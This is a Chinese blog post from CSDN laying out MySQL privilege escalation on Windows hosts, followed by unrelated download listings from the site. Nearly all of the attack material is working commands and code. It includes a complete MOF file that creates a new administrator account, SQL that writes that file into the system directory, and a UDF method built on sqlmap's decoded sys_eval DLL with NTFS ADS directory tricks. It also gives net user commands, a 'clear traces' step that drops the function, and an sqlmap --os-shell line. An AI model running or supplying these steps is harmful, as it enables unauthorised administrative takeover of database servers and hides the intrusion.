SQLPrivilgeEscalation

于 2021-01-06 23:18:47 发布
阅读量106 收藏
点赞数
分类专栏: Acrobatics
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/112299994
版权

mysql提权

1.MOF 提取

利用条件

使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。

提权原理

利用了**c:/windows/system32/wbem/mof/**目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行

基本步骤

编写mof文件,必须命名为nullevt.mof
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
上传到c:\windows\system32(或c:\winnt\)目录
mysql> select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

--此处C:/wmpub/nullevt.mof为上次mof文件位置,可联合文件上传漏洞,在www目录下写入mof文件

此处var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")执行添加admin用户

再次上传mof文件,把admin用户提权到管理员组(修改var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators secist /add\")

最终创建了管理员用户

远程桌面连接
mstsc /admin

2.UDF提取

利用条件

1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数,有root账号密码。
2、Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
3、Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。
4、掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备root账号所具备的权限的其它账号也可以。

提权方法

mysql5.1及以上版本,必须要把udf.dll文件放到mysql安装目录的lib\plugin文件夹下才能创建自定义函数。该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录。

sqlmap里是有udf.dll文件的,就在sqlmap/udf/mysql/windows目录下,里面有32位和64位
注意:这里的位数是mysql的位数,并不是对方系统的位数。sqlmap里的udf.dll是通过异或编码的,使用之前一定要记得解码,解码的工具也在sqlmap中

基本步骤

udf.dll解码
python /usr/share/sqlmap/extra/cloak/cloak.py  -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

#/usr/share/sqlmap/extra/cloak/cloak.py自带的locak解码脚本
#/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 为sqlmap自带UDF文件路径

#执行完成后会在/usr/share/sqlmap/data/udf/mysql/windows/64/文件夹下生成lib_mysqludf_sys.dll文件

#攻击者可以利用lib_mysqludf_sys提供的函数执行系统命令。
#sys_eval,执行任意命令,并将输出返回。
#sys_exec,执行任意命令,并将退出码返回。
#sys_get,获取一个环境变量。
#sys_set,创建或修改一个环境变量。

并把lib_mysqludf_sys.dll文件上传到站点目录下,改名为udf.dll

文件导入

MySQL<5.0,导出路径随意;

5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)

MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

一般lib\plugin文件夹需要手工建立(可用NTFS ADS流模式突破进而创建文件夹)有webshell可以直接创建,没有的话使用 into dumpfile 写入

手工建立lib\plugin文件夹
mysql> select @@basedir;  //查找到mysql的目录
 
mysql> select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
 
mysql> select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

NTFS ADS的前世今生

从udf文件中引入自定义函数
mysql> create function sys_eval returns string soname 'udf.dll'; 
--sys_eval是函数名称,udf.dll是lib_mysqludf_sys.dll_上传后的文件名
执行自定义函数
mysql> select sys_eval('net user admin admin /add'); 
mysql> select sys_eval('net localgroup administrators admin /add');
远程桌面连接
mstsc /admin
清除痕迹
mysql> drop function sys_eval; --删除函数
mysql> delete from mysql.func where name='sys_eval' --删除函数

其他

版本>5.6.34 secure-file-priv需要为空才可以通过mysql传udf

1. into outfile 直接写入
-- 1.将udf的内容进行16进制编码 得到字符串 A
hexdump lib_mysqludf_sys.dll
-- 2.写入文件
mysql> select A into outfile 'C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/udf.dll';
-- 3.创建sys_eval
mysql> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
-- 4.获取system执行权限
mysql> select sys_eval('whoami');
2. 表内容导出写入
-- 1.将udf的内容进行16进制编码 得到字符串 A
hexdump lib_mysqludf_sys.dll
-- 2.建立表保存16进制内容
mysql> set @my_udf=concat('',A);
mysql> create table udf_data(data LONGBLOB);
--3.将my_udf的内容插入表udf_data中。
mysql> insert into udf_data values("");
mysql> update udf_data set data = @my_udf;
--4.将内容导出到文件。
mysql> select data from udf_data into DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/udf.dll';
--5.执行系统命令
mysql> create function sys_eval returns string soname 'udf.dll';
mysql> select sys_eval('whoami');

3.sqlmap写入UDF

sqlmap.py -d "mysql://root:root@172.0.0.1:3306/mysql" --os-shell

MySQL 利用UDF执行命令

mof/udf提权

udf提取

hee_mee
关注
专栏目录
yolov5s nnie.zip
11-26
yolov5s nnieyolov5-nnieyolov5s nnieYOLOv5 pytorch -> onnx -> caffe -> .wk 1、模型是yolov5s,将focus层替换成stride为2的卷积层。reshape和permute层也做了调整。具体的修改过程可以参考这个大佬的文章https://blog.csdn.net/tangshopping/article/details/1100386052、模型是在hi3559av100上跑的,mapper版本是1.2。3、用法mkdir buildcd buildcmake -DCMAKE_TOOLCHAIN_FILE=../hi3559.toolchain.cmake ..make -j4./yolo_nnie参考https://blog.csdn.net/tangshopping/article/details/110038605watermelooon/nnie_yolohttps://github.com/ultralytics/yolov5https://githu
基于uni-app+uview-ui开发的校园云打印系统微信小程序项目源码+文档说明
11-26
基于uni-app+uview-ui开发的校园云打印系统微信小程序项目源码+文档说明,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于uni-app+uview-ui开发的校园云打印系统微信小程序项目源码+文档说明,本基于uni-app+uview-ui开发的校园云打印系统微信小程序项目源码+文档说明资源中的源码都是经过本地编译过可运行的,评审分达到98分,基于uni-app+uview-ui开发的校园云打印系统微信小程序项目源码+文档说明资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。本资源中的源码都是经过本地编译过可运行的,评审分达到98分
使用Java写的一个简易的贪吃蛇小游戏.zip
11-26
使用Java写的一个简易的贪吃蛇小游戏.zip数据
计算机网络概述.docx
11-26
计算机网络概述概念:网络把主机连接起来,而互联网是把多种不同的网络连接起来,因此互联网是网络的网络。计算机网络主要包括三个部分:计算机(包括客户端、服务器)网络设备(路由器、交换机、防火墙等)传输介质(有线和无线) ISP 互联网服务提供商ISP可以从互联网管理机构获得许多IP地址,同时拥有通信线路以及路由器等联网设备,个人或机构向ISP缴纳一定的费用就可以接入互联网。 目前的互联网是一种多层次ISP结构,ISP根据覆盖面积的大小分为主干ISP、地区ISP和本地ISP。互联网交换点IXP允许两个ISP直接相连而不用经过第三个ISP。 主机之间的通信方式 1、客户-服务器(C/S) 客户即是服务请求方,服务器是服务提供方。2、对等(P2P) 不区分客户和服务器 时延总时延=发送时延+传播时延+处理时延+排队时延计算机网络体系结构OSI:应用层、表示层、会话层、传输层、网络层、数据链路层、物理层五层协议:应用层、运输层、网络层、数据链路层、物理层TCP/IP:应用层、运输层、网际层、网络接口层 带通调制 模拟信号是连续的信号,数字信号是离散的信号。带通调制把数字信号转换为模拟信号。数据
数学建模学习资料 姜启源数学模型课件 M06 稳定性模型 共46页.pptx
11-26
数学建模学习资料 姜启源数学模型课件 M06 稳定性模型 共46页.pptx
【IEA-2024研报】到2030年满足中国电力系统灵活性需求(英).pdf
11-26
行业研究报告、行业调查报告、研报
游戏账号交易小程序 微信小程序+SSM毕业设计 源码+数据库+论文+启动教程.zip
11-26
游戏账号交易小程序 微信小程序+SSM毕业设计 源码+数据库+论文+启动教程 项目启动教程:https://www.bilibili.com/video/BV1BfB2YYEnS
结合 Swin Transformer 的小物体检测算法用于茶芽检测.zip
11-26
结合 Swin Transformer 的小物体检测算法用于茶芽检测STF-YOLO(基于yolov8)基于yolov8的模型改进包含多个backbone和head改进,以及多种注意力机制网络结构策略在cfg/models/v8里2024.4.28 朋友反应出现了问题,这里我把我所有的文件上传到STF-YOLO包库里ultralytics文件夹由于ultralytics使用的一键安装模式,本地再下载,会和环境里的包冲突我的方法就是用ultralytics替换环境里的ultralytics包,然后更改ultralytics包里的文件、代码做法比如说我使用的Ubuntu,所以只要将我新上传的ultralytics文件夹替换掉\wsl.localhost\Ubuntu-20.04\home\ling\miniconda3\envs\torch\lib\python3.8\site-packages目录下的ultralytics即可在本地虚拟环境的找一下conda里的环境里的包就行物体检测yolov8模型改进《结合 Swin Transformer 的茶芽
有关如何在您自己的网站的任何位置添加 Google 一键注册的演示.zip
11-26
有关如何在您自己的网站的任何位置添加 Google 一键注册的演示内联 Google 一键注册要运行演示,请克隆 repo,然后启动服务器python -m SimpleHTTPServer 8080index.html展示如何将Google 一键注册(又名 Google Yolo)纳入你自己的注册表单中,或纳入你网站的任何合理位置,以帮助提高你的注册转化率 Google One-Tap 的问题默认情况下,Google 一键注册会以弹出窗口的形式显示position: fixed在您的网站上。如果该窗口遮挡了重要信息或导航,可能会让用户感到失望。如果这是用户第一次看到 Google 一键注册,他们可能也会感到困惑,因为如今大多数“使用 Google 登录”体验都与传统注册表单并列,而不是独立于自己的弹出窗口。 来自 hipmunk.com 的示例展示了 Google One-tap 的开箱即用体验。解决方案我们建议将 Google One-tap 包装起来,<iframe>以便您可以将其包含在您自己的注册表单中,或包含在对您的网站有意义的任何位置。
java毕设项目之基于SpringBoot的德百商城停车场管理系统(源码+说明文档+mysql).zip
11-26
环境说明:开发语言:Java 框架:springboot JDK版本:JDK1.8 服务器:tomcat7 数据库:mysql 5.7 数据库工具:Navicat 开发软件:eclipse/myeclipse/idea Maven包:Maven 浏览器:谷歌浏览器。 项目均可完美运行
网络训练、图像制作以及部分hend功能是基于pc端实现的,只有主干网络部署在fpga上,片上资源无法支持整个网络所需资源,建议外部添加存储及DDR.zip
最新发布
11-26
网络训练、图像制作以及部分hend功能是基于pc端实现的,只有主干网络部署在fpga上,片上资源无法支持整个网络所需资源,建议外部添加存储及DDRyolov5-fpga-硬件加速写在前面网络训练、图像制作以及部分head功能是基于pc端实现的,只有主干网络部署在fpga上,片上资源无法支持整个网络所需资源,建议添加外部存储及DDR注意,这里只添加了模块代码,考虑到不同板子对应的eda不同,只将fpga中纯源码给出可,经过仿真无误。添加相关ip核及引脚配置进行组网
pocketbase.exe
11-26
前端/后端/AI/运维/全栈工程师 常用工具 2024年最新版
一个Java语言写的俄罗斯方块小游戏 因为作者刚接触Java,正在摸索着学习.zip
11-26
一个Java语言写的俄罗斯方块小游戏。因为作者刚接触Java,正在摸索着学习.zip
考研冲刺吸引力法则.docx
11-26
冲刺阶段最重要的除了学习,还有心态!也就是我们对待困难,对待即将到来的考试的态度。不知道大家有没有听说过「吸引力法则」这个词。吸引力法则是一种心理学的概念,它主张我们所吸引到自己身边的事物,与我们内心的情绪、信念息息相关。 如果我们内心充满了积极的情绪,那么就会吸引到积极的结果,从而实现我们的目标。相反,如果我们内心是消极的,就会吸引到消极的结果。 这何尝不是一种帮助我们调整心态的好方法。我们想象着自己成功上岸的那一天,然后为了迎接这个结果,不断地努力。现在其实已经进入了考研战役的最关键阶段,我们走过了漫长的备考之路,马上就要是收获的时候。 回顾这一路的备考,我们遇到了许多挑战和困难。有时候,我们会觉得自己已经付出了很多,但是却没有任何回报。有时候,我们会感到孤单、无助,仿佛没有人能够理解我们的痛苦。在接下来的冲刺阶段,我们可能还会遇到更大的挑战,越来越近的考试,越来越紧张的备考氛围。 但是要相信,其实我们并不孤单。在我们的身边,有默默守护的家人,有一起并肩作战的同学,大家都在朝着自己目标不断地前进着。 最重要的是我们一定要相信自己,相信自己考研道路上最强大的武器。
石头剪刀布VOC标记数据集
11-26
石头剪刀布VOC标记数据集
【IRENA-2024研报】绿色氢气质量基础设施路线图(英).pdf
11-26
行业研究报告、行业调查报告、研报
路面泥泞,坑洼,裂缝,路面损坏,马路牙检测 yolov5
11-26
路面泥泞,坑洼,裂缝,路面损坏,马路牙检测 yolov5标记
BTAJ大厂面试题汇总
11-26
有迷茫没方向、找工作、咨询面试突击班、简历已读不回、跳槽涨薪、提升学习、进大厂等问题的程序员朋友
TensorFlow 中的 3D YOLO 实现.zip
11-26
TensorFlow 中的 3D YOLO 实现YOLO3DTensorFlow 中的 3D YOLO 实现
新能源汽车充电插口类型识别-YOLOV9标记,可识别Type1,ccs2的充电标准
11-26
新能源汽车充电插口类型识别-YOLOV9标记,可识别Type1,ccs2的充电标准
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值